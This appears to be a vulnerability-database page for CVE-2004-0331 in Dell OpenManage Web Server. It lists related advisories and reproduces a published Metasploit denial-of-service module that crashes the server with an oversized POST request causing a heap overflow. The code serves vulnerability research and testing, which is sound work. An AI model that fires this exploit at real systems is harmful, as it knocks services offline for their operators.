| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2004-0331 | 29 May 201815:50 | – | circl | |
| Dell OpenManage Web Server Buffer Overflow - Ver2 (CVE-2004-0331) | 28 Dec 201400:00 | – | checkpoint_advisories | |
| Dell OpenManage Web Server Buffer Overflow - Ver2 (CVE-2004-0331) | 28 Dec 201400:00 | – | checkpoint_advisories | |
| CVE-2004-0331 | 18 Mar 200405:00 | – | cve | |
| CVE-2004-0331 | 18 Mar 200405:00 | – | cvelist | |
| Dell OpenManage POST Request Heap Overflow (win32) | 23 Jun 200913:23 | – | metasploit | |
| CVE-2004-0331 | 23 Nov 200405:00 | – | nvd | |
| Dell OpenManage Web Server <= 3.7.1 | 3 Nov 200500:00 | – | openvas |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
'Description' => %q{
This module exploits a heap overflow in the Dell OpenManage
Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
exists due to a boundary error within the handling of POST requests,
where the application input is set to an overly long file name.
This module will crash the web server, however it is likely exploitable
under certain conditions.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],
[ 'BID', '9750' ],
[ 'OSVDB', '4077' ],
[ 'CVE', '2004-0331' ],
],
'DisclosureDate' => '2004-02-26'))
register_options(
[
Opt::RPORT(1311),
OptBool.new('SSL', [true, 'Use SSL', true]),
],
self.class)
end
def run
connect
foo = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)
sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"
sploit << "Content-Length: #{foo.length}\r\n\r\n"
sploit << foo
sock.put(sploit +"\r\n\r\n")
disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation